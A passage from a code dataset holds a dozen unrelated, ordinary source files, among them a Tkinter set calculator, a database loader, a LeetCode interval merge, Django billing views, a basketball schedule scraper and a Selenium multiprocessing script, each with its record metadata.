\"eslint-config-standard-with-typescript\",\n \"eslint-plugin-import\",\n \"eslint-plugin-n\",\n \"eslint-plugin-promise\",\n ],\n dev=True,\n )\n write_file(\n \".eslintrc.js\",\n \"\"\"module.exports = {\n env: {\n browser: true,\n es2021: true,\n node: true,\n },\n extends: ['airbnb', 'airbnb-typescript'],\n overrides: [],\n parserOptions: {\n ecmaVersion: 'latest',\n sourceType: 'module',\n project: './tsconfig.json',\n },\n rules: {},\n};\n\"\"\",\n )\n\n write_file(\n \".prettierrc\",\n \"\"\"{\n \"printWidth\": 100,\n \"singleQuote\": true,\n \"trailingComma\": \"all\"\n}\n\"\"\",\n )\n\n\nif __name__ == \"__main__\":\n project_dir = os.path.expanduser(r\"{{JS_PROJECT_DIR}}\")\n cd(project_dir)\n print(\"Project dir: %s\" % project_dir)\n\n copy(TEMPLATE_DIR + \"/LICENSE\", \"LICENSE\", overwrite=False)\n\n menu.exec()\n","sub_path":"scripts/r/web/js_tools.py","file_name":"js_tools.py","file_ext":"py","file_size_in_byte":12972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"360645523","text":"from tkinter import *\nimport fifthwindow\n\nclass Window3(Tk):\n\n def __init__(self):\n super().__init__()\n 
self.geometry(\"1000x350\")\n self.title(\"Third window\")\n\n #x = (self.winfo_screenwidth() - self.winfo_reqwidth()) / 2\n #y = (self.winfo_screenheight() - self.winfo_reqheight()) / 2\n #self.wm_geometry(\"+%d+%d\" % (x, y))\n\n def start(event):\n try:\n Window3.d = (Window3.setA | Window3.setB) ^ Window3.setC\n txt_result.insert(\"3.3\", Window3.d)\n fifthwindow.Window5.D2 = Window3.d\n except AttributeError:\n txt_result.delete(\"1.0\", END)\n txt_result.insert(\"1.0\", \"Аргумент не був знайдений\")\n\n def save(event):\n with open(r\"result3.txt\", \"w\") as f:\n try:\n f.write(\"D2 : \" + str(Window3.d))\n except AttributeError:\n f.write(\"Результат відсутній\")\n\n txtA = Text(self,height=4, width=200, wrap=WORD)\n txtB = Text(self,height=4, width=200, wrap=WORD)\n txtC = Text(self,height=4, width=200, wrap=WORD)\n lbl_lbl = Label(self, text=\"Результат:\", width=10)\n txt_result = Text(self, height=4, width=100, wrap=WORD)\n btn_res = Button(self, text=\"Розрахувати\")\n btn_res.bind(\"\", start)\n btn_save = Button(self, text=\"Зберегти\")\n btn_save.bind(\"\", save)\n\n try:\n txtA.insert(\"1.0\", Window3.setA)\n except AttributeError:\n txtA.delete(\"1.0\", END)\n txtA.insert(\"1.0\", \"Множина А: \"+\"Значення не знайдене\")\n try:\n txtB.insert(\"1.0\", Window3.setB)\n except AttributeError:\n txtB.delete(\"1.0\", END)\n txtB.insert(\"1.0\", \"Множина B: \"+\"Значення не знайдене\")\n try:\n txtC.insert(\"1.0\", Window3.setC)\n except AttributeError:\n txtC.delete(\"1.0\", END)\n txtC.insert(\"1.0\", \"Множина А: \"+\"Значення не знайдене\")\n txt_result.insert(\"1.0\", \"D2 = (AvВ)ΔC : \")\n\n txtA.grid(row=0, columnspan=3)\n txtB.grid(row=1, columnspan=3)\n txtC.grid(row=2, columnspan=3)\n lbl_lbl.grid(row=3, column=0, sticky=\"w\")\n txt_result.grid(row=5, columnspan=2)\n btn_res.grid(row=6, sticky=\"e\")\n btn_save.grid(sticky=\"w\")\n\n\nif __name__ == \"__main__\":\n root = Window3()\n root.mainloop()\n","sub_path":"lab1/thirdwindow.py","file_name":"thirdwindow.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"203405374","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom config import *\nimport sqlite3\nfrom app import db\nfrom models import Slides\n\nengine = create_engine(Config.SQLALCHEMY_DATABASE_URI, echo=True)\nprint(Config.SQLALCHEMY_DATABASE_URI)\nSession = sessionmaker(bind=engine)\nsession = Session()\n\ndef recreate_database():\n Base.metadata.drop_all(engine)\n Base.metadata.create_all(engine)\n\ndef loadpgsql():\n conn = sqlite3.connect('all_slides.db')\n c = conn.cursor()\n c.execute(\"select * from slides\")\n records = c.fetchall()\n properties = {}\n print(Slides.query.all())\n\n for row in records:\n i = 0\n slide = Slides()\n for key in c.description:\n if key[0].title() == \"Filename\" :\n slide.filename = row[i]\n if key[0].title() == \"Number\" :\n slide.number = row[i]\n if key[0].title() == \"Genus\" :\n slide.genus = row[i]\n if key[0].title() == \"Species\" :\n slide.species = row[i]\n if key[0].title() == \"Stain\" :\n slide.stain = row[i]\n if key[0].title() == \"Accession_Number\" :\n slide.accession_number = row[i]\n if key[0].title() == \"Source\" :\n slide.source = row[i]\n if key[0].title() == \"Contributor\" :\n slide.contributor = row[i]\n if key[0].title() == \"Processing\" :\n slide.processing = row[i]\n if key[0].title() == \"Comments\" :\n slide.comments = row[i]\n if key[0].title() == 
\"Date_Sent_To_Aperio\" :\n slide.date_sent_to_aperio = row[i]\n if key[0].title() == \"Date_Collected\" :\n slide.date_collected = row[i]\n if key[0].title() == \"Date_Received\" :\n slide.date_received = row[i]\n if key[0].title() == \"Sample\" :\n slide.sample = row[i]\n if key[0].title() == \"Infect\" :\n slide.infect = row[i]\n if key[0].title() == \"Study\" :\n slide.study = row[i]\n if key[0].title() == \"Collection_Site\" :\n slide.collection_site = row[i]\n if key[0].title() == \"Histopathologic_Description\" :\n slide.histopathologic_description = row[i]\n if key[0].title() == \"Attachment\" :\n slide.attachment = row[i]\n\n properties[key[0].title()] = row[i]\n i = i + 1\n db.session.add(slide)\n db.session.commit()\n db.session.flush()\n conn.close()\n print(Slides.query.all())\n\ndb.session.close()\n\nloadpgsql()","sub_path":"crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"511877399","text":"# 56. Merge Intervals\n#\n# Given a collection of intervals, merge all overlapping intervals.\n#\n# For example,\n# Given [1,3],[2,6],[8,10],[15,18],\n# return [1,6],[8,10],[15,18].\n\n\n# Definition for an interval.\nclass Interval(object):\n def __init__(self, s=0, e=0):\n self.start = s\n self.end = e\n\n\nclass Solution(object):\n def merge(self, intervals):\n \"\"\"\n :type intervals: List[Interval]\n :rtype: List[Interval]\n \"\"\"\n if not intervals:\n return []\n intervals.sort(key=lambda x: x.start)\n result = []\n curr = Interval(intervals[0].start, intervals[0].end)\n for inter in intervals:\n if inter.start > curr.end:\n result.append([curr.start, curr.end])\n curr.start = inter.start\n curr.end = max(curr.end, inter.end)\n result.append([curr.start, curr.end])\n return result","sub_path":"python/056_merge_intervals.py","file_name":"056_merge_intervals.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"385566111","text":"# This file is a part of Fedora Tagger\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\n#\n# Refer to the README.rst and LICENSE files for full details of the license\nimport tw2.core as twc\nfrom tw2.jqplugins.ui import DialogWidget\n\nimport codecs\nimport docutils.examples\n\n\ndef hotkeys_readme():\n \"\"\" Pick the README.rst off of disk and render the hotkeys section \"\"\"\n\n root = '/'.join(__file__.split('/')[:-4])\n fname = root + '/README.rst'\n with codecs.open(fname, 'r', 'utf-8') as f:\n rst = f.read()\n hotkeys = rst.split('.. hotkeys')[1]\n return docutils.examples.html_body(hotkeys)\n\n\nclass HotkeysDialog(DialogWidget):\n \"\"\" jQuery UI dialog for the hotkeys help. 
\"\"\"\n\n id = 'hotkeys_dialog'\n options = {\n 'title': 'Hotkeys',\n 'autoOpen': False,\n 'width': 550,\n }\n value = hotkeys_readme()\n\n\nsearch_action_js = twc.JSLink(link=\"javascript/search.js\")\n\nclass SearchDialog(DialogWidget):\n \"\"\" jQuery UI dialog for the searchbar. \"\"\"\n\n id = 'search_dialog'\n resources = DialogWidget.resources + [search_action_js]\n options = {\n 'title': 'Search for a package',\n 'autoOpen': False,\n 'width': 350,\n 'modal': True,\n }\n value = \"\"\"\"\"\"\n\nadd_js = twc.JSLink(link=\"javascript/add.js\")\n\nclass AddTagDialog(DialogWidget):\n \"\"\" jQuery UI dialog for adding a new tag. \"\"\"\n\n id = 'add_dialog'\n resources = DialogWidget.resources + [add_js]\n options = {\n 'title': 'Add new tags (comma-separated)',\n 'autoOpen': False,\n 'width': 350,\n 'modal': True,\n }\n value = \"\"\"
Press Enter to save tag
\"\"\"\n\nclass LeaderboardDialog(DialogWidget):\n \"\"\" jQuery UI dialog for showing the leaderboard. \"\"\"\n\n id = 'leaderboard_dialog'\n options = {\n 'title': 'Leaderboard',\n 'autoOpen': False,\n 'width': 350,\n 'modal': True,\n }\n\nclass StatisticsDialog(DialogWidget):\n \"\"\" jQuery UI dialog for showing the statistics. \"\"\"\n\n id = 'statistics_dialog'\n options = {\n 'title': 'Statistics',\n 'autoOpen': False,\n 'width': 350,\n 'modal': True,\n }\n","sub_path":"fedoratagger/frontend/widgets/dialog.py","file_name":"dialog.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"471922177","text":"class Solution(object):\n def numIslands(self, grid):\n \"\"\"\n :type grid: List[List[str]]\n :rtype: int\n \"\"\"\n def dfs(x,y):\n grid[x][y]='A'\n if x-1>=0 and grid[x-1][y]=='1':\n dfs(x-1,y)\n if y-1>=0 and grid[x][y-1]=='1':\n dfs(x,y-1)\n if x+1 0:\n invoices = InvoiceForPayment.objects.filter(abon=abon, status=False)\n for inv in invoices:\n if inv.kilovats > 0 and abon.ballance > 0:\n\n prev_inv = inv.get_previous_by_date_create()\n kilovats = inv.kilovats - prev_inv.kilovats\n\n # есть неоплаченные киловаты: можно оплатить\n amount = TariffMan().calc_amount(abon, kilovats)\n abon.make_pay(kernel_user, amount)\n inv.set_ok()\n inv.save()\n abon.save()\n return HttpResponse('ok')\n\n\n@login_required\n@permission_required('abonapp.add_invoiceforpayment')\ndef add_invoice(request, uid):\n uid = mydefs.safe_int(uid)\n abon = get_object_or_404(Abon, id=uid)\n\n if request.method == 'POST':\n curr_kilovats = mydefs.safe_int(request.POST.get('curr_kilovats'))\n\n newinv = InvoiceForPayment()\n newinv.abon = abon\n newinv.kilovats = curr_kilovats\n\n if request.POST.get('status') == u'on':\n newinv.status = True\n\n newinv.tarif_pay = abon.current_tariff\n newinv.author = request.user\n newinv.save()\n return redirect('abonhome_link', uid=uid)\n else:\n return render(request, 'abonapp/addInvoice.html', {\n 'csrf_token': csrf(request)['csrf_token'],\n 'abon': abon,\n 'invcount': InvoiceForPayment.objects.filter(abon=abon).count()\n })\n\n\n@login_required\ndef log_page(request):\n return render(request, 'abonapp/log.html', {\n 'logs': AbonPayLog.objects.all()\n })\n","sub_path":"abonapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"619379616","text":"import logging\n\nfrom control.VKHelper import helperInstance\n\nlogging.basicConfig(filemode=\"w\", filename=\"jaba.log\", level=logging.INFO)\n\nlog = logging.getLogger()\n\n\ndef error(error_str):\n helperInstance.write_msg(error_str)\n log.error(error_str)\n","sub_path":"Utils/Logger.py","file_name":"Logger.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"254456234","text":"\"\"\"\nvisualize how validation loss and acceptance probability\nchange with different lambda values (lambda = do no harm regularization)\n\"\"\"\nimport sys\nimport argparse\nimport logging\nimport numpy as np\nimport pandas as pd\n\nimport matplotlib\nmatplotlib.use('Agg')\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\n\nfrom common import load_model, pickle_to_file, pickle_from_file, process_params, is_within_interval, get_normal_ci\n\ndef parse_args(args):\n ''' parse command line arguments '''\n\n parser = 
argparse.ArgumentParser(description=__doc__)\n\n parser.add_argument('--seed',\n type=int,\n default=0)\n parser.add_argument('--num-test',\n type=int,\n default=100)\n parser.add_argument('--data-split-file',\n type=str,\n default=\"_output/data_split.pkl\")\n parser.add_argument('--data-file',\n type=str,\n default=\"_output/data.pkl\")\n parser.add_argument('--fitted-files',\n type=str,\n default=\"_output/fitted.pkl\",\n help=\"comma separated\")\n parser.add_argument('--plot-val-loss-file',\n type=str,\n default=\"_output/plot_lambda.png\")\n parser.add_argument('--plot-support-val-loss-file',\n type=str,\n default=\"_output/plot_support_unif_lambda.png\")\n parser.add_argument('--plot-accept-region-file',\n type=str,\n default=\"_output/plot_accept_region_lambda.png\")\n parser.add_argument('--plot-accept-file',\n type=str,\n default=\"_output/plot_accept_lambda.png\")\n parser.add_argument('--plot-support-accept-file',\n type=str,\n default=\"_output/plot_accept_unif_lambda.png\")\n parser.set_defaults()\n args = parser.parse_args()\n args.fitted_files = process_params(args.fitted_files, str)\n return args\n\ndef plot_accepted_vs_density(data_dict, fitted_models, args, mesh_size=0.05):\n \"\"\"\n Plot acceptance probability. Last row plot pdf of X\n \"\"\"\n COLORS = ['yellow', 'orange', 'red', 'green']\n LINESTYLES = ['solid', 'dashed', 'dotted', 'dashdot']\n\n num_models = len(fitted_models)\n # Look at the region we accepted\n test_x = data_dict[\"support_sim_settings\"].support_unif_rvs(args.num_test)\n x_pdf = data_dict[\"data_gen\"].get_x_pdf(test_x)\n\n all_pred_dfs = []\n for fitted_model in fitted_models:\n x_accept_probs = fitted_model.get_accept_prob(test_x)\n pred_df = pd.DataFrame({\"log_density\": np.log(x_pdf)})\n pred_df[\"accept\"] = x_accept_probs.ravel()\n pred_df[\"do_no_harm\"] = fitted_model.do_no_harm_param\n all_pred_dfs.append(pred_df)\n\n plt.clf()\n all_pred_dfs = pd.concat(all_pred_dfs)\n sns.lmplot(x=\"accept\", y=\"log_density\", hue=\"do_no_harm\", data=all_pred_dfs, lowess=True, scatter=False)\n plt.savefig(args.plot_accept_region_file)\n\ndef plot_accepted_rejected_region(data_dict, fitted_models, args, mesh_size=0.05):\n \"\"\"\n Plot acceptance probability. 
Last row plot pdf of X\n \"\"\"\n COLORS = ['yellow', 'orange', 'red', 'green']\n LINESTYLES = ['solid', 'dashed', 'dotted', 'dashdot']\n\n num_models = len(fitted_models)\n # Look at the region we accepted\n mesh_coords, (xx, yy) = data_dict[\"support_sim_settings\"].generate_grid(mesh_size)\n x_pdf = data_dict[\"data_gen\"].get_x_pdf(mesh_coords)\n all_accept_probs = []\n for fitted_model in fitted_models:\n x_accept_probs = fitted_model.get_accept_prob(mesh_coords)\n all_accept_probs.append(x_accept_probs)\n\n fig, ax = plt.subplots(nrows=1, figsize=(4,4))\n for idx, x_accept_probs in enumerate(all_accept_probs):\n print(\"MIN ACC\", np.min(x_accept_probs))\n cs = ax.contour(\n xx,\n yy,\n x_accept_probs.reshape(xx.shape),\n levels=[0.99],\n colors=COLORS[idx],\n linestyles=LINESTYLES[idx],\n linewidths=4)\n ax.clabel(cs, inline=1, fontsize=10, fmt=str(fitted_models[idx].do_no_harm_param))\n cs = ax.contourf(xx, yy, x_pdf.reshape(xx.shape), cmap='gray')\n cbar = fig.colorbar(cs, ax=ax)\n cbar.ax.tick_params(labelsize=18)\n ax.tick_params(axis='both', which='major', labelsize=18)\n plt.savefig(args.plot_accept_region_file)\n\n\ndef plot_validation_losses(fitted_models, data, args):\n validation_losses = []\n lambdas = []\n for fitted_model in fitted_models:\n validation_loss = -fitted_model.score(data.x, data.y)\n validation_losses.append(validation_loss)\n lambdas.append(fitted_model.do_no_harm_param)\n\n print(\"loss argmin\", np.argmin(validation_losses))\n print(\"val loss\", validation_losses)\n plt.clf()\n sns.regplot(\n lambdas,\n validation_losses,\n fit_reg=False)\n #plt.xscale(\"log\")\n #plt.yscale(\"log\")\n plt.savefig(args.plot_val_loss_file)\n\ndef plot_validation_losses_support_unif(\n fitted_models,\n support_sim_settings,\n data_gen,\n args):\n sim_support_x = support_sim_settings.support_unif_rvs(args.num_test)\n support_unif_data = data_gen.create_data_given_x(sim_support_x)\n\n validation_losses = []\n lambdas = []\n for fitted_model in fitted_models:\n validation_loss = -fitted_model.score(support_unif_data.x, support_unif_data.y)\n validation_losses.append(validation_loss)\n lambdas.append(fitted_model.do_no_harm_param)\n\n print(\"unif loss argmin\", np.argmin(validation_losses))\n print(\"unif val loss\", validation_losses)\n plt.clf()\n sns.regplot(\n lambdas,\n validation_losses,\n fit_reg=False)\n #plt.xscale(\"log\")\n #plt.yscale(\"log\")\n plt.savefig(args.plot_support_val_loss_file)\n\ndef plot_accept_probs(\n fitted_models,\n data,\n args):\n all_accept_probs = []\n lambdas = []\n for fitted_model in fitted_models:\n accept_probs = fitted_model.get_accept_prob(data.x)\n all_accept_probs.append(np.mean(accept_probs))\n lambdas.append(fitted_model.do_no_harm_param)\n\n print(\"accept\", all_accept_probs)\n plt.clf()\n sns.regplot(\n lambdas,\n all_accept_probs,\n fit_reg=False)\n #plt.xscale(\"log\")\n plt.savefig(args.plot_accept_file)\n\ndef plot_accept_probs_support_unif(\n fitted_models,\n support_sim_settings,\n data_gen,\n args):\n sim_support_x = support_sim_settings.support_unif_rvs(args.num_test)\n\n all_accept_probs = []\n lambdas = []\n for fitted_model in fitted_models:\n accept_probs = fitted_model.get_accept_prob(sim_support_x)\n all_accept_probs.append(np.mean(accept_probs))\n lambdas.append(fitted_model.do_no_harm_param)\n print(\"lambdas\", lambdas)\n print(\"uniform accept\", all_accept_probs)\n plt.clf()\n sns.regplot(\n lambdas,\n all_accept_probs,\n fit_reg=False)\n #plt.xscale(\"log\")\n 
plt.savefig(args.plot_support_accept_file)\n\ndef main(args=sys.argv[1:]):\n args = parse_args(args)\n np.random.seed(args.seed)\n\n # Read all data\n orig_data_dict = pickle_from_file(args.data_file)\n # Get the appropriate datasplit\n split_dict = pickle_from_file(args.data_split_file)\n recalib_data = orig_data_dict[\"train\"].subset(split_dict[\"recalibrate_idxs\"])\n args.num_p = recalib_data.x.shape[1]\n\n # Load models\n fitted_models = [load_model(fitted_file) for fitted_file in args.fitted_files]\n\n # Do all the plotting\n if args.num_p == 2:\n plot_accepted_rejected_region(orig_data_dict, fitted_models, args)\n else:\n plot_accepted_vs_density(orig_data_dict, fitted_models, args)\n #plot_validation_losses(fitted_models, recalib_data, args)\n #plot_validation_losses_support_unif(\n # fitted_models,\n # orig_data_dict[\"support_sim_settings\"],\n # orig_data_dict[\"data_gen\"],\n # args)\n #plot_accept_probs(fitted_models, recalib_data, args)\n #plot_accept_probs_support_unif(\n # fitted_models,\n # orig_data_dict[\"support_sim_settings\"],\n # orig_data_dict[\"data_gen\"],\n # args)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"plot_simulation_do_no_harm.py","file_name":"plot_simulation_do_no_harm.py","file_ext":"py","file_size_in_byte":8133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"417271163","text":"# -*- coding: utf-8 -*-\r\n###\r\n### Created on Tue Jul 23 10:34:10 2019\r\n\r\n### @author: AUy\r\n###\r\n\r\n# -*- coding: utf-8 -*-\r\n###\r\n### Created on Wed Jun 26 09:49:41 2019\r\n\r\n### @author: AUy\r\n###\r\n\r\nfrom requests import get\r\nfrom requests.exceptions import RequestException\r\nfrom contextlib import closing\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nfrom datetime import datetime\r\n\r\ndef simple_get(url):\r\n###\r\n### Attempts to get the content at `url` by making an HTTP GET request.\r\n### If the content-type of response is some kind of HTML/XML, return the\r\n### text content, otherwise return None.\r\n###\r\n try:\r\n with closing(get(url, stream=True)) as resp:\r\n if is_good_response(resp):\r\n return resp.content\r\n else:\r\n return None\r\n\r\n except RequestException as e:\r\n log_error('Error during requests to {0} : {1}'.format(url, str(e)))\r\n return None\r\n\r\n\r\ndef is_good_response(resp):\r\n###\r\n### Returns True if the response seems to be HTML, False otherwise.\r\n###\r\n content_type = resp.headers['Content-Type'].lower()\r\n return (resp.status_code == 200 \r\n and content_type is not None \r\n and content_type.find('html') > -1)\r\n\r\n\r\ndef log_error(e):\r\n \r\n### It is always a good idea to log errors. 
/ \r\n### This function just prints them, but you can /\r\n### make it do anything.\r\n\r\n print(f'could not find {e}')\r\n\r\ndef get_nba_tags():\r\n nba_team_html = simple_get('http://www.basketball-reference.com')\r\n nba_team_soup = BeautifulSoup(nba_team_html, 'html.parser')\r\n \r\n conf = ['E','W']\r\n nba_all = []\r\n for item in conf:\r\n nba_active = nba_team_soup.find(lambda tag: tag.name=='table' and tag.has_attr('id') and tag['id']==f'confs_standings_{item}')\r\n\r\n# nba_active = nba_team_soup.find(lambda tag: tag.name=='table' and tag.has_attr('id') and tag['id']==f'confs_standings_W') ### test line for correct table on main page\r\n\r\n nba_active_full = nba_active.find_all(lambda tag: tag.name=='th' and tag.has_attr('data-stat') and tag['data-stat']=='team_name')\r\n\r\n abr_list = []\r\n for row in nba_active_full[1:]:\r\n abr = row.a.text[0:]\r\n abr_list.append(abr)\r\n nba_all.append(abr_list)\r\n nba_teams = nba_all[0] + nba_all[1] \r\n return nba_teams \r\n\r\n\r\n\r\n# extract team schedule\r\ndef get_nba_schedule(url,team,season):\r\n c_list = [url, team, season]\r\n# c_list = ['www.basketball-reference.com', 'MIN', '2019'] ##### TEST VALUES. MAKE SURE TO REPLACE WITH ACTUAL VARIABLE!!! ########\r\n for item in c_list:\r\n str(item)\r\n# team = 'MIN' ##### Test step for adding home value to web list\r\n raw_html = simple_get(f'http://{c_list[0]}/teams/{c_list[1]}/{c_list[2]}_games.html')\r\n if raw_html is not None:\r\n raw_html_parse = BeautifulSoup(raw_html, 'html.parser')\r\n link_str = raw_html_parse.select('td') #make list \r\n# print(link_str) ####Step 1 check \r\n link_li_d, link_li_t, link_li_l, link_li_opp = [[] for i in range(4)] #make empty list\r\n link_list = [link_li_d, link_li_t, link_li_l, link_li_opp] #list of lists\r\n data_stat_name = ['date_game','game_start_time','game_location','opp_name'] #####!!!!! these are the indicators when filtering to the 'td' tag (e.g. 
data-stat=''))\r\n \r\n for item in range(len(link_list)):\r\n for td in link_str:\r\n if td['data-stat'] == data_stat_name[item]:\r\n link_list[item].append(td.text)\r\n\r\n\r\n opp_abr = raw_html_parse.find(lambda tag: tag.name=='table' and tag.has_attr('id') and tag['id']=='games') ###this to pull abbreviations for team names\r\n opp_abr_team_html = opp_abr.find_all(lambda tag: tag.name=='td' and tag.has_attr('data-stat') and tag['data-stat']=='opp_name')\r\n opp_abr_list = []\r\n for item in opp_abr_team_html:\r\n ol2 = item.find('a')['href']\r\n opp_abr_list.append(ol2)\r\n opp_df = pd.DataFrame(opp_abr_list, columns=['team_html'])\r\n opp_df_breakout = opp_df['team_html'].str.split('/',expand=True)\r\n opp_df['team_abr'] = opp_df_breakout.iloc[:,2]\r\n opp_df['home_abr'] = team\r\n link_li_table = list(zip(opp_df['home_abr'], link_li_d, link_li_t, link_li_l, link_li_opp, opp_df['team_abr']))\r\n\r\n# print(link_li_table) ##### Step 2 Check \r\n# return link_li_table ##### Step 2 \r\n ########DATAFRAME HERE##########\r\n link_df = pd.DataFrame(link_li_table) \r\n headers = link_df.columns = ['home_abr','date','time','location','opponent','opp_abr'] # renamed columns\r\n \r\n #### DATE PARSING################\r\n link_df['date'].replace(' ','')\r\n link_df[['weekday','month_day','year']] = link_df['date'].str.split(',', expand=True) #split date column\r\n link_df['date_squish'] = link_df['date'].str.strip() # split month_day column\r\n \r\n ########## DATE MODIFICATION###################\r\n date_breakout = link_df['date'].str.split(' ', expand=True)\r\n headers_date_breakout = date_breakout.columns = ['weekday','month', 'day', 'year']\r\n date_breakout_weekday = date_breakout['weekday'].str.replace(',','') #remove comma in weekday\r\n date_breakout_day = date_breakout['day'].str.replace(',','') #remove comma in day\r\n date_breakout['weekday'] = date_breakout_weekday ##### add to date series ##### YOU CAN CONSOLIDATE THIS LINE\r\n date_breakout['day'] = date_breakout_day #### add to date series ##### YOU CAN CONSOLIDATE THIS LINE \r\n date_breakout['date2'] = date_breakout['month'] + ' ' + date_breakout['day'] + ' ' + date_breakout['year']\r\n \r\n date_breakout['date2'] = [datetime.strptime(m, '%b %d %Y') for m in date_breakout['date2']]\r\n\r\n link_df['date2'] = date_breakout['date2'] # ADD TO DATAFRAME .\r\n \r\n# hm_gm_list = [row + 1 for row in link_df.iloc[:,0]]\r\n \r\n# link_df['hm_gm_index'] = link_df.reset_index() ####!!GIVES ERROR!!###### ValueError when trying to reset index to have home game count\r\n\r\n link_df_1 = link_df[link_df['location']==''].loc[:,['home_abr','opponent','opp_abr','weekday','date2','time']] ##### FINAL DATAFRAME #####\r\n\r\n test_n = []\r\n for n in range(len(link_df_1)):\r\n n += 1\r\n test_n.append(n)\r\n \r\n link_df_1['home_game_nm'] = test_n\r\n\r\n# print(link_df_1) ### validation step for final dataframe\r\n \r\n return link_df_1\r\n else:\r\n log_error(raw_html)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import time\r\n site = 'www.basketball-reference.com'\r\n team_abr = get_nba_tags()\r\n year = str(input('Enter season: '))\r\n \r\n start = time.time()\r\n print('Retreiving team lists...')\r\n \r\n nba = []\r\n [nba.append(get_nba_schedule(site,item,year)) for item in team_abr] \r\n \r\n nba_df = [pd.DataFrame(obj) for obj in nba]\r\n nba_con = pd.concat(nba_df) \r\n\r\n end = time.time()\r\n print('time elapsed: % seconds' % (end - start))\r\n\r\n \r\n print(nba_con) \r\n\r\n decision = ['y','n']\r\n\r\n while True:\r\n export = 
input(\"would you like to export this file? ('y' for yes/'n' for no) - \") #export process\r\n\r\n \r\n if export == decision[0]:\r\n nba_con.to_csv(f'C:\\\\Users\\\\AUy\\\\Downloads\\\\nba schedule_{year}.csv', index_label='Reg Season Game #')\r\n print(f'saved to filepath C:\\\\Users\\\\AUy\\\\Downloads\\\\ as \"nba schedule_{year}.csv\"')\r\n print('END')\r\n break\r\n elif export == decision[1]: \r\n print('file not saved')\r\n print('END')\r\n break\r\n elif export is None:\r\n print('Value must be entered. Please try again')\r\n export = None\r\n else:\r\n print('Value not recognized. Make sure to use lower case for \"y\" or \"n\" Please try again.')\r\n export = None \r\n \r\n\r\n \r\n \r\n\r\n","sub_path":"msal2.py","file_name":"msal2.py","file_ext":"py","file_size_in_byte":8086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"165828391","text":"from inter.interkeys import HTTP\nimport inspect\n\nhttp=HTTP('w')\n# 从http这个实例对象里面获取到post这个属性或者方法\n# func等价于http.post\nfunc=getattr(http,'post')\n# 获取参数列表\ns=inspect.getfullargspec(func).__str__()\nprint(s)\ns=s[s.find('args=')+5:s.find(', varargs')]\ns=eval(s)\ns.remove('self')\nprint(s)","sub_path":"test_fanshe.py","file_name":"test_fanshe.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"492414384","text":"import multiprocessing\r\nimport time\r\nfrom multiprocessing import Queue\r\nimport os\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.add_argument('-ignore-certificate-errors')\r\nbrowser = webdriver.Chrome(options=options)\r\n\r\n\r\nclass MultProcess(multiprocessing.Process):\r\n def __init__(self, Que: Queue):\r\n multiprocessing.Process.__init__(self)\r\n self.Que = Que\r\n\r\n def run(self):\r\n while not self.Que.empty():\r\n # print(self.Que.get(), os.getpid())\r\n browser.get(self.Que.get())\r\n\r\n\r\nif __name__ == '__main__':\r\n time_start = time.time()\r\n queue1 = Queue()\r\n # for i in range(2000):\r\n # queue1.put(i)\r\n queue1.put(\"https://www.baidu.com/\")\r\n queue1.put(\"http://www.cctv.com/\")\r\n queue1.put(\"http://www.people.com.cn/\")\r\n queue1.put(\"https://xiaoyouxi.360.cn/?src=youxi\")\r\n queue1.put(\"https://www.ctrip.com/?allianceid=1328&sid=1643\")\r\n queue1.put(\"https://p4psearch.1688.com/\")\r\n queue1.put(\"https://www.tmall.com/\")\r\n queue1.put(\"https://nj.58.com//\")\r\n queue1.put(\"https://zonghe.hao.360.cn/#cid=youlike?\")\r\n\r\n p = MultProcess(queue1)\r\n w = MultProcess(queue1)\r\n e = MultProcess(queue1)\r\n p.start()\r\n w.start()\r\n e.start()\r\n # p.join()\r\n # w.join()\r\n # e.join()\r\n time_end = time.time()\r\n print(time_end - time_start)\r\n","sub_path":"Multiprocessing_learn.py","file_name":"Multiprocessing_learn.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"626013878","text":"import subprocess\nimport os\nimport uuid\nimport pickle\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport sys\nimport random\n\n# Fix RNG for reproducibility\nRANDOM_SEED = \"332021\"\nrandom.seed(RANDOM_SEED)\n\n# Training parameters\nNUM_LAYERS = 6\nNUM_HEADS = 8\nTRANSFORMER_FF = 2048\nBATCH_SIZE = 256\nRNN_SIZE = 512\nWORD_VEC_SIZE = 512\nVALID_BATCH_SIZE = 